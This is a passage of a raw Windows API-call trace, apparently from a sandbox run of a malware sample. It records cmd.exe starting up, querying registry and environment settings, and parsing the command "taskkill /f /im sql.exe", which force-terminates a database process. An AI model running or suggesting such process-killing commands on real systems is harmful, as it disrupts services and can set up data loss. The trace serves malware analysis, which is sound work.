(lpModuleName=0x0) returned 0x49ee0000 [0060.268] __set_app_type (_Type=0x1) [0060.268] __p__fmode () returned 0x74eb31f4 [0060.589] __p__commode () returned 0x74eb31fc [0060.589] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0060.589] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0060.590] GetCurrentThreadId () returned 0xb38 [0060.590] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb38) returned 0x60 [0060.590] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0060.590] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0060.590] SetThreadUILanguage (LangId=0x0) returned 0x409 [0060.590] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0060.590] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x37f9dc | out: phkResult=0x37f9dc*=0x0) returned 0x2 [0060.590] VirtualQuery (in: lpAddress=0x37fa13, lpBuffer=0x37f9ac, dwLength=0x1c | out: lpBuffer=0x37f9ac*(BaseAddress=0x37f000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0060.590] VirtualQuery (in: lpAddress=0x280000, lpBuffer=0x37f9ac, dwLength=0x1c | out: lpBuffer=0x37f9ac*(BaseAddress=0x280000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0060.590] VirtualQuery (in: lpAddress=0x281000, lpBuffer=0x37f9ac, dwLength=0x1c | out: lpBuffer=0x37f9ac*(BaseAddress=0x281000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0060.590] VirtualQuery (in: lpAddress=0x283000, lpBuffer=0x37f9ac, dwLength=0x1c | out: lpBuffer=0x37f9ac*(BaseAddress=0x283000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0060.591] VirtualQuery (in: lpAddress=0x380000, lpBuffer=0x37f9ac, dwLength=0x1c | out: lpBuffer=0x37f9ac*(BaseAddress=0x380000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x150000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0060.591] GetConsoleOutputCP () returned 0x1b5 [0060.591] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0060.591] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0060.591] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.591] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0060.591] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.591] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0060.591] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.591] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0060.592] _get_osfhandle (_FileHandle=0) returned 0x3 [0060.592] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0060.592] _get_osfhandle (_FileHandle=0) returned 0x3 [0060.592] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0060.592] GetEnvironmentStringsW () returned 0x732038* [0060.592] GetProcessHeap () returned 0x720000 [0060.592] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xaca) returned 0x732b10 [0060.592] FreeEnvironmentStringsW (penv=0x732038) returned 1 [0060.592] GetProcessHeap () returned 0x720000 [0060.592] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x4) returned 0x730c70 [0060.592] GetEnvironmentStringsW () returned 0x732038* [0060.592] GetProcessHeap () returned 0x720000 [0060.592] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xaca) returned 0x7335e8 [0060.593] FreeEnvironmentStringsW (penv=0x732038) returned 1 [0060.593] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x37e94c | out: phkResult=0x37e94c*=0x68) returned 0x0 [0060.593] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x37e954, lpData=0x37e958, lpcbData=0x37e950*=0x1000 | out: lpType=0x37e954*=0x0, lpData=0x37e958*=0x0, lpcbData=0x37e950*=0x1000) returned 0x2 [0060.593] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x37e954, lpData=0x37e958, lpcbData=0x37e950*=0x1000 | out: lpType=0x37e954*=0x4, lpData=0x37e958*=0x1, lpcbData=0x37e950*=0x4) returned 0x0 [0060.593] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x37e954, lpData=0x37e958, lpcbData=0x37e950*=0x1000 | out: lpType=0x37e954*=0x0, lpData=0x37e958*=0x1, lpcbData=0x37e950*=0x1000) returned 0x2 [0060.593] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x37e954, lpData=0x37e958, lpcbData=0x37e950*=0x1000 | out: lpType=0x37e954*=0x4, lpData=0x37e958*=0x0, lpcbData=0x37e950*=0x4) returned 0x0 [0060.593] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x37e954, lpData=0x37e958, lpcbData=0x37e950*=0x1000 | out: lpType=0x37e954*=0x4, lpData=0x37e958*=0x40, lpcbData=0x37e950*=0x4) returned 0x0 [0060.593] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x37e954, lpData=0x37e958, lpcbData=0x37e950*=0x1000 | out: lpType=0x37e954*=0x4, lpData=0x37e958*=0x40, lpcbData=0x37e950*=0x4) returned 0x0 [0060.593] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x37e954, lpData=0x37e958, lpcbData=0x37e950*=0x1000 | out: lpType=0x37e954*=0x0, lpData=0x37e958*=0x40, lpcbData=0x37e950*=0x1000) returned 0x2 [0060.593] RegCloseKey (hKey=0x68) returned 0x0 [0060.593] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x37e94c | out: phkResult=0x37e94c*=0x68) returned 0x0 [0060.593] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x37e954, lpData=0x37e958, lpcbData=0x37e950*=0x1000 | out: lpType=0x37e954*=0x0, lpData=0x37e958*=0x40, lpcbData=0x37e950*=0x1000) returned 0x2 [0060.593] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x37e954, lpData=0x37e958, lpcbData=0x37e950*=0x1000 | out: lpType=0x37e954*=0x4, lpData=0x37e958*=0x1, lpcbData=0x37e950*=0x4) returned 0x0 [0060.593] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x37e954, lpData=0x37e958, lpcbData=0x37e950*=0x1000 | out: lpType=0x37e954*=0x0, lpData=0x37e958*=0x1, lpcbData=0x37e950*=0x1000) returned 0x2 [0060.593] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x37e954, lpData=0x37e958, lpcbData=0x37e950*=0x1000 | out: lpType=0x37e954*=0x4, lpData=0x37e958*=0x0, lpcbData=0x37e950*=0x4) returned 0x0 [0060.593] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x37e954, lpData=0x37e958, lpcbData=0x37e950*=0x1000 | out: lpType=0x37e954*=0x4, lpData=0x37e958*=0x9, lpcbData=0x37e950*=0x4) returned 0x0 [0060.593] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x37e954, lpData=0x37e958, lpcbData=0x37e950*=0x1000 | out: lpType=0x37e954*=0x4, lpData=0x37e958*=0x9, lpcbData=0x37e950*=0x4) returned 0x0 [0060.594] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x37e954, lpData=0x37e958, lpcbData=0x37e950*=0x1000 | out: lpType=0x37e954*=0x0, lpData=0x37e958*=0x9, lpcbData=0x37e950*=0x1000) returned 0x2 [0060.594] RegCloseKey (hKey=0x68) returned 0x0 [0060.594] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebad [0060.594] srand (_Seed=0x5d97ebad) [0060.594] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im sql.exe" [0060.594] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im sql.exe" [0060.594] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.594] GetProcessHeap () returned 0x720000 [0060.594] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x210) returned 0x732038 [0060.594] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x732040, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0060.594] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0060.594] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0060.594] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0060.594] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0060.594] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0060.594] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0060.594] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0060.594] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0060.595] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0060.595] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0060.595] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0060.595] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0060.595] GetProcessHeap () returned 0x720000 [0060.595] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x732b10 | out: hHeap=0x720000) returned 1 [0060.595] GetEnvironmentStringsW () returned 0x732250* [0060.595] GetProcessHeap () returned 0x720000 [0060.595] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xae2) returned 0x734bb0 [0060.595] FreeEnvironmentStringsW (penv=0x732250) returned 1 [0060.595] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0060.595] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0060.595] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0060.595] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0060.595] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0060.595] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0060.595] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0060.595] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0060.595] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0060.595] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0060.595] GetProcessHeap () returned 0x720000 [0060.595] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x54) returned 0x7356a0 [0060.595] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x37f718 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.595] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x37f718, lpFilePart=0x37f714 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x37f714*="Desktop") returned 0x25 [0060.595] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0060.595] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x37f494 | out: lpFindFileData=0x37f494*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x731eb8 [0060.596] FindClose (in: hFindFile=0x731eb8 | out: hFindFile=0x731eb8) returned 1 [0060.596] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x37f494 | out: lpFindFileData=0x37f494*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x731eb8 [0060.596] FindClose (in: hFindFile=0x731eb8 | out: hFindFile=0x731eb8) returned 1 [0060.596] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0060.596] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x37f494 | out: lpFindFileData=0x37f494*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x731eb8 [0060.596] FindClose (in: hFindFile=0x731eb8 | out: hFindFile=0x731eb8) returned 1 [0060.596] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0060.596] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0060.596] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0060.596] GetProcessHeap () returned 0x720000 [0060.596] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x734bb0 | out: hHeap=0x720000) returned 1 [0060.596] GetEnvironmentStringsW () returned 0x7340c0* [0060.596] GetProcessHeap () returned 0x720000 [0060.596] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xb36) returned 0x735f00 [0060.596] FreeEnvironmentStringsW (penv=0x7340c0) returned 1 [0060.597] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.597] GetProcessHeap () returned 0x720000 [0060.597] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x7356a0 | out: hHeap=0x720000) returned 1 [0060.597] GetProcessHeap () returned 0x720000 [0060.597] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x400e) returned 0x736a40 [0060.597] GetProcessHeap () returned 0x720000 [0060.597] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x3c) returned 0x731eb8 [0060.597] GetProcessHeap () returned 0x720000 [0060.597] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x736a40 | out: hHeap=0x720000) returned 1 [0060.597] GetConsoleOutputCP () returned 0x1b5 [0060.597] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0060.597] GetUserDefaultLCID () returned 0x409 [0060.598] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0060.598] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x37f858, cchData=128 | out: lpLCData="0") returned 2 [0060.598] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x37f858, cchData=128 | out: lpLCData="0") returned 2 [0060.598] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x37f858, cchData=128 | out: lpLCData="1") returned 2 [0060.598] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0060.598] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0060.598] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0060.598] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0060.598] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0060.598] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0060.599] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0060.599] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0060.599] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0060.599] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0060.599] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0060.600] GetProcessHeap () returned 0x720000 [0060.600] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x20c) returned 0x732dc8 [0060.600] GetConsoleTitleW (in: lpConsoleTitle=0x732dc8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.600] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0060.600] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0060.600] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0060.600] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0060.600] GetProcessHeap () returned 0x720000 [0060.600] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x400a) returned 0x736a40 [0060.600] GetProcessHeap () returned 0x720000 [0060.601] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x736a40 | out: hHeap=0x720000) returned 1 [0060.601] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0060.601] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0060.601] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0060.601] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0060.601] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0060.601] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0060.601] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0060.601] GetProcessHeap () returned 0x720000 [0060.601] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x58) returned 0x732fe0 [0060.601] GetProcessHeap () returned 0x720000 [0060.601] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x1a) returned 0x735740 [0060.602] GetProcessHeap () returned 0x720000 [0060.602] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x28) returned 0x733040 [0060.602] GetConsoleTitleW (in: lpConsoleTitle=0x37f550, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.603] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0060.603] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0060.603] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0060.603] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0060.603] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0060.603] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0060.603] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0060.603] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0060.603] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0060.603] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0060.603] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0060.603] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0060.603] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0060.603] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0060.603] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0060.603] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0060.603] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0060.603] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0060.603] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0060.603] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0060.603] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0060.603] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0060.604] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0060.604] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0060.604] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0060.604] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0060.604] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0060.604] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0060.604] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0060.604] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0060.604] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0060.604] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0060.604] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0060.604] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0060.604] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0060.604] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0060.604] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0060.604] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0060.604] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0060.604] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0060.604] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0060.604] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0060.604] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0060.604] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0060.604] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0060.604] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0060.604] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0060.604] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0060.604] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0060.604] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0060.604] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0060.604] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0060.604] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0060.604] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0060.604] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0060.604] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0060.604] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0060.604] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0060.605] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0060.605] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0060.605] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0060.605] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0060.605] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0060.605] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0060.605] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0060.605] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0060.605] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0060.605] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0060.605] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0060.605] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0060.605] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0060.605] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0060.605] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0060.605] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0060.605] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0060.605] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0060.605] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0060.605] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0060.605] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0060.605] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0060.605] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0060.605] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0060.605] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0060.605] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0060.605] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0060.605] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0060.605] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0060.606] GetProcessHeap () returned 0x720000 [0060.606] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x210) returned 0x733070 [0060.606] GetProcessHeap () returned 0x720000 [0060.606] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x3a) returned 0x733288 [0060.606] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0060.606] GetProcessHeap () returned 0x720000 [0060.606] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x418) returned 0x7207f0 [0060.606] SetErrorMode (uMode=0x0) returned 0x0 [0060.606] SetErrorMode (uMode=0x1) returned 0x0 [0060.606] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7207f8, lpFilePart=0x37f070 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x37f070*="Desktop") returned 0x25 [0060.606] SetErrorMode 